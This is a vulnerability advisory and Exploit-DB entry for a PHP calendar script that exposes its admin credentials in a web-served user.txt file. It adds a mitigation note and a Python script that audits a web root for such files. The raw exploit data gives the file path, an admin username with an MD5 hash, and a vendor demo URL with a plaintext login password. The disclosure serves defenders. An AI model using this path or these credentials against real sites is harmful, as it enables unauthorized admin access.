Vendor: PHP calendar script
By: Meisam Monsef
CVSS: 7.5 (HIGH)
Password disclosure
CWE: 200
Product Name: PHP calendar script
Affected Version From: All versions
Affected Version To: All versions
Patch Exists: NO
Platforms Tested:
2016

PHP calendar script Password Download File

The PHP calendar script keeps its admin credentials in a user.txt file that the web server serves directly, so an attacker can download it from the URL shown in the exploit section below. The file holds the admin username and an MD5 hash of the password.

Mitigation:

The vendor should implement proper access controls and ensure that sensitive files are not accessible by unauthorized users. Regular security assessments and patching should be performed.
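
One way for a site operator to check their own deployment for this exposure, as an added example that is not part of the original advisory or the vendor's code: the script walks a document root and reports static files holding records in the `user|<32 hex>` layout shown in the exploit data. The function names, extension list, and sample web root are assumptions made for illustration.

```python
import os
import re
import tempfile

# Record layout shown in the advisory: "<user>|<32 hex chars>" (unsalted MD5).
CRED_LINE = re.compile(r"^[^|\s]+\|[0-9a-fA-F]{32}$")
# Assumption: extensions a web server typically serves as static content.
STATIC_EXTS = {".txt", ".dat", ".csv", ".bak", ".old", ""}


def find_exposed_credential_files(docroot, max_bytes=65536):
    """Return sorted relative paths under docroot that hold user|md5 records."""
    hits = []
    for dirpath, _dirs, files in os.walk(docroot):
        for name in files:
            if os.path.splitext(name)[1].lower() not in STATIC_EXTS:
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    lines = fh.read(max_bytes).splitlines()
            except OSError:
                continue  # unreadable file: skip, do not abort the audit
            if any(CRED_LINE.match(line.strip()) for line in lines):
                hits.append(os.path.relpath(path, docroot))
    return sorted(hits)


def demo():
    """Build a constructed web root and audit it."""
    with tempfile.TemporaryDirectory() as root:
        os.mkdir(os.path.join(root, "calendar"))
        samples = {
            # Constructed sample in the advisory's layout; hash is a placeholder.
            os.path.join("calendar", "user.txt"): "Admin|" + "0" * 32 + "\n",
            "readme.txt": "Calendar script install notes\n",
            "robots.txt": "User-agent: *\nDisallow: /calendar/\n",
        }
        for rel, body in samples.items():
            with open(os.path.join(root, rel), "w", encoding="utf-8") as fh:
                fh.write(body)
        return find_exposed_credential_files(root)


if __name__ == "__main__":
    for rel in demo():
        print("credential file inside web root:", rel)
```

Any path it reports should be moved outside the document root or denied by the web server, and the stored password changed, since a bare MD5 hash gives little protection once the file has been readable.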
Source

Exploit-DB raw data:

# Exploit Title: PHP calendar script Password Download File
# Date: 2016-07-18
# Exploit Author: Meisam Monsef meisamrce@yahoo.com or meisamrce@gmail.com
# Vendor Homepage: http://www.newsp.eu/calendarscript.php?pt=st
# Version: All Version
# Download Link : http://www.newsp.eu/calendar.zip

Exploit :
http://site/user.txt
Admin|fe01ce2a7fbac8fafaed7c982a04e229
Password Hash = fe01ce2a7fbac8fafaed7c982a04e229 (demo)[MD5]

Test :
Exploit : http://www.newsp.eu/demo/user.txt
Login Url : http://www.newsp.eu/demo/login.php
Password : demo